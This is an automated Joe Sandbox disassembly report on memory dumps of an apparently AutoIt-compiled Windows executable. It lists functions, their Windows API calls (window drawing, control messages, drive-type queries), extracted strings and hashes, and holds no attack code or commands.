Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68

Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
IsWindowVisible.USER32(?), ref: 0048364B

Strings

GETCURRENTSELECTION, xrefs: 004837E3
GETSELECTED, xrefs: 004838A3
SENDCOMMANDID, xrefs: 004839DA
ISENABLED, xrefs: 0048366B
SHOWDROPDOWN, xrefs: 004836E0
CURRENTTAB, xrefs: 004836BD
TABRIGHT, xrefs: 0048369D
TABLEFT, xrefs: 00483687
CHECK, xrefs: 0048386D
UNCHECK, xrefs: 00483883
GETCURRENTCOL, xrefs: 00483928
SELECTSTRING, xrefs: 00483806
ADDSTRING, xrefs: 00483716
HIDEDROPDOWN, xrefs: 00483700
GETCURRENTLINE, xrefs: 004838ED
GETLINE, xrefs: 0048399B
SETCURRENTSELECTION, xrefs: 004837B6
DELSTRING, xrefs: 00483749
EDITPASTE, xrefs: 0048395F
FINDSTRING, xrefs: 00483776
ISVISIBLE, xrefs: 00483637
ISCHECKED, xrefs: 00483839
GETLINECOUNT, xrefs: 004838C6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A

Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048A630
GetSysColorBrush.USER32(0000000F), ref: 0048A661
GetSysColor.USER32(0000000F), ref: 0048A66D
SetBkColor.GDI32(?,000000FF), ref: 0048A687
SelectObject.GDI32(?,00000000), ref: 0048A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
GetSysColor.USER32(00000010), ref: 0048A6C9
CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
FrameRect.USER32(?,?,00000000), ref: 0048A6DF
DeleteObject.GDI32(00000000), ref: 0048A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
FillRect.USER32(?,?,00000000), ref: 0048A763
GetWindowLongW.USER32(?,000000F0), ref: 0048A78E

Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: e63ce8fecf4f6123c3b51ac2f84dd81aff37f56c992807b035cdd3e2728beed2
Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
Opcode Fuzzy Hash: e63ce8fecf4f6123c3b51ac2f84dd81aff37f56c992807b035cdd3e2728beed2
Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A

Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00402CA2
DeleteObject.GDI32(00000000), ref: 00402CE8
DeleteObject.GDI32(00000000), ref: 00402CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

SendMessageW.USER32(?,00001053), ref: 0043C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912

Strings

0, xrefs: 0043C731

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99

Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
GetClientRect.USER32(00000000,?), ref: 0047763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
GetStockObject.GDI32(00000011), ref: 004776A2
SelectObject.GDI32(00000000,00000000), ref: 004776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
DeleteDC.GDI32(00000000), ref: 004776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
GetStockObject.GDI32(00000011), ref: 004777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB

Strings

DISPLAY, xrefs: 00477688
AutoIt v3, xrefs: 0047762B
msctls_progress32, xrefs: 0047773C
static, xrefs: 0047767D, 00477795

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68

Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59

Strings

PhysicalDrive, xrefs: 0046ADA7
USB, xrefs: 0046AEF0
RAID, xrefs: 0046AEF7
ATAPI, xrefs: 0046AECD
ATA, xrefs: 0046AED4
Removable, xrefs: 0046AE4D
SSD, xrefs: 0046AE86
SAS, xrefs: 0046AF05
CDROM, xrefs: 0046AE2F
MMC, xrefs: 0046AF1A
iSCSI, xrefs: 0046AEFE
SATA, xrefs: 0046AF0C
SCSI, xrefs: 0046AEC6
Unknown, xrefs: 0046AE1B, 0046AEBF
Fixed, xrefs: 0046AE43
RAMDisk, xrefs: 0046AE25
SSA, xrefs: 0046AEE2
Virtual, xrefs: 0046AF21
FileBackedVirtual, xrefs: 0046AF28
Fibre, xrefs: 0046AEE9
\\.\, xrefs: 0046AD70
1394, xrefs: 0046AEDB
Network, xrefs: 0046AE39

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
Opcode Fuzzy Hash: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F

Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00406931
__wcsnicmp.LIBCMT ref: 00406949
__wcsnicmp.LIBCMT ref: 00406961
__wcsnicmp.LIBCMT ref: 00406979
__wcsnicmp.LIBCMT ref: 00406991
__wcsnicmp.LIBCMT ref: 004069A9
__wcsnicmp.LIBCMT ref: 004069C1
__wcsnicmp.LIBCMT ref: 004069D5
__wcsnicmp.LIBCMT ref: 00406A16
__wcsnicmp.LIBCMT ref: 00406A2A
__wcsnicmp.LIBCMT ref: 00406A3E
__wcsnicmp.LIBCMT ref: 00406A52

Strings

#notrayicon, xrefs: 00406943
Cannot parse #include, xrefs: 0043E3F0
Bad directive syntax error, xrefs: 0043E31A
#cs, xrefs: 004069CF, 00406A24
#include-once, xrefs: 0040698B
Unterminated group of comments, xrefs: 0043E403
#ce, xrefs: 00406A4C
#comments-start, xrefs: 004069BB, 00406A10
#OnAutoItStartRegister, xrefs: 00406973
#comments-end, xrefs: 00406A38
#include, xrefs: 004069A3
#pragma compile, xrefs: 0040692B
#requireadmin, xrefs: 0040695B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: c2cb4ceb81a9fb86b22fb91a037a826352b5ec73775e3533fd93c245e235c0fa
Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
Opcode Fuzzy Hash: c2cb4ceb81a9fb86b22fb91a037a826352b5ec73775e3533fd93c245e235c0fa
Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D

Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0048A903
SetTextColor.GDI32(?,?), ref: 0048A907
GetSysColorBrush.USER32(0000000F), ref: 0048A91D
GetSysColor.USER32(0000000F), ref: 0048A928
CreateSolidBrush.GDI32(?), ref: 0048A92D
GetSysColor.USER32(00000011), ref: 0048A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
SelectObject.GDI32(?,00000000), ref: 0048A964
SetBkColor.GDI32(?,00000000), ref: 0048A96D
SelectObject.GDI32(?,?), ref: 0048A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
DrawFocusRect.USER32(?,?), ref: 0048AA3D
GetSysColor.USER32(00000011), ref: 0048AA4B
SetTextColor.GDI32(?,00000000), ref: 0048AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
DeleteObject.GDI32(?), ref: 0048AA89
SelectObject.GDI32(?,?), ref: 0048AA8F
DeleteObject.GDI32(?), ref: 0048AA94
SetTextColor.GDI32(?,?), ref: 0048AA9A
SetBkColor.GDI32(?,?), ref: 0048AAA4

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: df27593039a2a3c6053042b7d9a2d22140a6caacc7a9282d6f0daff4a54aa358
Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
Opcode Fuzzy Hash: df27593039a2a3c6053042b7d9a2d22140a6caacc7a9282d6f0daff4a54aa358
Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54

Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
CharNextW.USER32(0000014E), ref: 00488B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
_memset.LIBCMT ref: 00488C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
_memset.LIBCMT ref: 00488CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
DrawMenuBar.USER32(?), ref: 00488EC3
SetWindowTextW.USER32(?,0000014E), ref: 00488EEB

Strings

0, xrefs: 00488E55

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 620f0146723a92550614622863fc1dbb46bf9ceb3d6abe555e8fc84cca08bbc9
Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
Opcode Fuzzy Hash: 620f0146723a92550614622863fc1dbb46bf9ceb3d6abe555e8fc84cca08bbc9
Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69

Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004849CA
GetDesktopWindow.USER32 ref: 004849DF
GetWindowRect.USER32(00000000), ref: 004849E6
GetWindowLongW.USER32(?,000000F0), ref: 00484A48
DestroyWindow.USER32(?), ref: 00484A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
IsWindowVisible.USER32(?), ref: 00484B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
GetWindowRect.USER32(?,?), ref: 00484B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
CopyRect.USER32(?,?), ref: 00484BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00484C32

Strings

0, xrefs: 00484975
tooltips_class32, xrefs: 00484A96
(, xrefs: 00484BA3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59

Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
_wcscpy.LIBCMT ref: 00464500
_wcscmp.LIBCMT ref: 0046450B
_wcscat.LIBCMT ref: 00464521
_wcsstr.LIBCMT ref: 0046452C
